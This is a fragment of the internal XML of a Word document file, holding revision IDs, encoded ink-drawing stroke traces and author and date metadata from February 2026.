    <w:rsid w:val="00DF01BB"/>
    <w:rsid w:val="00E12945"/>
    <w:rsid w:val="00E15382"/>
    <w:rsid w:val="00E8385B"/>
    <w:rsid w:val="00F31B9D"/>
    <w:rsid w:val="00FA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F8C3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6E23524A-B1E1-49FB-8DE5-4D6DBB24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50:42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0 119 24575,'96'-15'0,"-78"14"0,1-1 0,-1-1 0,0-1 0,31-9 0,3 3 0,-45 10 0,0-1 0,0 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,9-6 0,1-2-341,0 1 0,1 1-1,28-10 1,-33 14-6485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50:32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66 24575,'10'1'0,"0"1"0,0 0 0,0 1 0,0 0 0,0 1 0,11 6 0,-3-2 0,12 6 0,0 2 0,-1 1 0,30 25 0,47 26 0,-61-42 0,-17-10 0,0-1 0,34 13 0,72 17 0,-105-34 0,-1 1 0,0 2 0,-1 0 0,32 24 0,-43-28 0,27 17-1365,-31-22-5461</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2511.24">38 352 24575,'-15'-105'0,"3"-63"0,5 102-1365,4 53-5461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Bharathi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dhanush Bharathi</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-04T15:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-05T08:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>